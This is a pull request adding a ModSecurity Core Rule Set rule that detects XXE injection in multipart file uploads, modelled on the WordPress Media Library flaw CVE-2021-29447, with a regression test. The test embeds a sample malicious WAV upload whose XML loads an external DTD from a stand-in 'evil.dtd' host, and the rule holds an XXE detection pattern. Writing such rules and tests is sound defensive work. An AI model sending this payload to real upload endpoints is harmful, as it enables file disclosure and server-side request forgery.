### PR TITLE
New XXE rule file (again)

### DIFF
--- a/rules/REQUEST-945-APPLICATION-ATTACK-XXE.conf
+++ b/rules/REQUEST-945-APPLICATION-ATTACK-XXE.conf
@@ -1,0 +1,76 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+# Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file.
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:945011,phase:1,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:945012,phase:2,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+# -=[ XXE in file upload ] =-
+# This rule prevent XXE injection when the endpoint parse an uploaded file
+# with a library affected by XXE vulnerability (such as the audio parsing library ID3)
+# leading to RCE or LFI.
+#
+# Example, WordPress Core XXE on Media Library file upload:
+# CVE-2021-29447: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
+#
+SecRule REQUEST_BODY "@rx <?xml.+<!DOCTYPE.+<!ENTITY.+\s+(?:SYSTEM|PUBLIC)\s+" \
+    "id:945100,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:compressWhitespace,\
+    msg:'XML eXternal Entity in file upload',\
+    logdata:'Matched Data: %{TX.0} found within REQUEST_BODY',\
+    tag:'application-multi',\
+    tag:'language-xml',\
+    tag:'platform-multi',\
+    tag:'attack-xxe',\
+    tag:'paranoia-level/1',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/242',\
+    ctl:auditLogParts=+E,\
+    ver:'OWASP_CRS/3.3.0',\
+    severity:'CRITICAL',\
+    chain"
+    SecRule REQUEST_HEADERS:Content-Type "@contains multipart/form-data" \
+        "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+        setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
+        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:945013,phase:1,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:945014,phase:2,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:945015,phase:1,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:945016,phase:2,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+#
+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:945017,phase:1,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:945018,phase:2,pass,nolog,skipAfter:END-REQUEST-945-APPLICATION-ATTACK-XXE"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-945-APPLICATION-ATTACK-XXE"

--- a/tests/regression/tests/REQUEST-945-APPLICATION-ATTACK-XXE/945100.yaml
+++ b/tests/regression/tests/REQUEST-945-APPLICATION-ATTACK-XXE/945100.yaml
@@ -1,0 +1,42 @@
+---
+  meta:
+    author: "Andrea Menin (theMiddle)"
+    description: "XML eXternal Entity"
+    enabled: true
+    name: 945100.yaml
+  tests:
+  -
+    test_title: 945100-1
+    desc: "Test XXE in file upload"
+    stages:
+    - stage:
+        input:
+          dest_addr: "127.0.0.1"
+          headers:
+            Host: "localhost"
+            User-Agent: "ModSecurity CRS 3 Tests"
+            Content-Type: "multipart/form-data; boundary=----WebKitFormBoundarysbZ9sZS2ONRQAD7q"
+          port: 80
+          method: POST
+          data:
+          - "------WebKitFormBoundarysbZ9sZS2ONRQAD7q"
+          - "Content-Disposition: form-data; name=\"name\""
+          - ""
+          - "malicious.wav"
+          - "------WebKitFormBoundarysbZ9sZS2ONRQAD7q"
+          - "Content-Disposition: form-data; name=\"action\""
+          - ""
+          - "upload-attachment"
+          - "------WebKitFormBoundarysbZ9sZS2ONRQAD7q"
+          - "Content-Disposition: form-data; name=\"_wpnonce\""
+          - ""
+          - "0034421736"
+          - "------WebKitFormBoundarysbZ9sZS2ONRQAD7q"
+          - "Content-Disposition: form-data; name=\"async-upload\"; filename=\"malicious.wav\""
+          - "Content-Type: audio/wav"
+          - ""
+          - "RIFFXWAVEiXML{<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://example.com/evil.dtd'>%remote;%init;%trick;]>fmtXXXXXdataXXXXXX"
+          - "------WebKitFormBoundarysbZ9sZS2ONRQAD7q--"
+          uri: "/"
+        output:
+          log_contains: id "945100"


### PR DESCRIPTION
Waiting for a cross-ModSecurity-version solution to handle XXE attacks on CT application/xml, this XXE rule file could collect all XXE rules that are not affected by incompatibility issues.

For now, it contains just a rule to prevent XXE injection in file upload, starting from the use case of the recent WordPress Core XXE vulnerability on the Media Library upload functionality.

Is it worth dedicating a new file for it? I'm not sure about the rule tags I used and in general if I missed something creating a new file. Anyone can check? Thanks!